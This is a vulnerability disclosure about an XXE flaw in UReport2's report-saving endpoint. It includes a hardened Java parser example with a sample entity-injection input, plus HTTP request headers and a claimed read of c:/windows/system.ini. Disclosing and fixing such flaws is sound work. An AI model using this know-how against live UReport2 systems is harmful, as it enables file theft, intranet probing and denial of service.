Ureport2 XXE (Author: idam0n)
The interface that saves reports does not disable external entity resolution when it parses XML data. An attacker can therefore submit malicious data that injects XML external entities: read arbitrary files from the operating system, trigger SSRF to probe intranet hosts, and, by declaring a large number of recursively referenced entities, cause a denial of service.
The vulnerable code is in ureport2-core-2.2.9.jar, method com.bstek.ureport.parser.ReportParser.parse, shown in the screenshot:

[screenshot: com.bstek.ureport.parser.ReportParser.parse]

The program reads the XML input directly, and the parser is not configured to prohibit external entity references, which results in XXE.
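For comparison, the following is an added example (not UReport2's own code) of how a JAXP DOM parser for the submitted report XML looks with DOCTYPE and external entities disabled; the class name SafeReportXml and the sample inputs are constructed for this illustration, and the actual parser library used by ReportParser.parse is not visible on this page (if it is dom4j's SAXReader, the same feature URIs apply through its setFeature method).

```java
import java.io.StringReader;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;
import org.xml.sax.SAXParseException;

public final class SafeReportXml {
    // Hardened JAXP factory: DTDs and external entities are refused before any
    // entity can be resolved, so a <!DOCTYPE ...> payload is rejected outright.
    static DocumentBuilderFactory hardenedFactory() throws ParserConfigurationException {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        return f;
    }

    // Parses the 'content' parameter of a save request; any DOCTYPE raises SAXParseException.
    static Document parseReport(String content) throws Exception {
        DocumentBuilder b = hardenedFactory().newDocumentBuilder();
        return b.parse(new InputSource(new StringReader(content)));
    }

    public static void main(String[] args) throws Exception {
        // Constructed sample: a minimal report document without a DTD parses normally.
        String benign = "<?xml version=\"1.0\" encoding=\"UTF-8\"?><ureport>"
                + "<cell name=\"A1\" row=\"1\" col=\"1\"><simple-value><![CDATA[]]></simple-value></cell>"
                + "</ureport>";
        System.out.println("benign root element: " + parseReport(benign).getDocumentElement().getTagName());

        // Constructed sample carrying a DOCTYPE with a SYSTEM entity (placeholder URI):
        // the hardened factory stops at the DOCTYPE and never resolves the entity.
        String withDoctype = "<?xml version=\"1.0\"?><!DOCTYPE x [<!ENTITY xxe SYSTEM \"file:///nonexistent\">]>"
                + "<ureport><cell name=\"A1\"><simple-value>&xxe;</simple-value></cell></ureport>";
        try {
            parseReport(withDoctype);
            System.out.println("UNEXPECTED: DOCTYPE was accepted");
        } catch (SAXParseException e) {
            System.out.println("rejected as expected: " + e.getMessage());
        }
    }
}
```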
Reproducing in a local build environment: use IDEA to build a Spring Boot demo project and add the ureport2 dependency.
Exploiting the Vulnerability
Now add the XXE payload to the POST parameter 'content'.
The request with the XML payload:

POST /ureport/designer/saveReportFile HTTP/1.1
Host: 192.168.66.39:8881
Content-Length: 3936
Accept: /
Origin: http://192.168.66.39:8881
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://192.168.66.39:8881/ureport/designer
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=F988AAC7F0ED6210948EE2DB114A8A86
Connection: close
Now open the report: the content of c:/windows/system.ini is shown in the rendered cell.

[screenshot: rendered report showing the contents of c:/windows/system.ini]
It should also be noted that the function has no access control, so it can be accessed by any user.
Furthermore, an XML External Entity (XXE) injection can also be used for SSRF and DoS.
SSRF:

[screenshot: SSRF]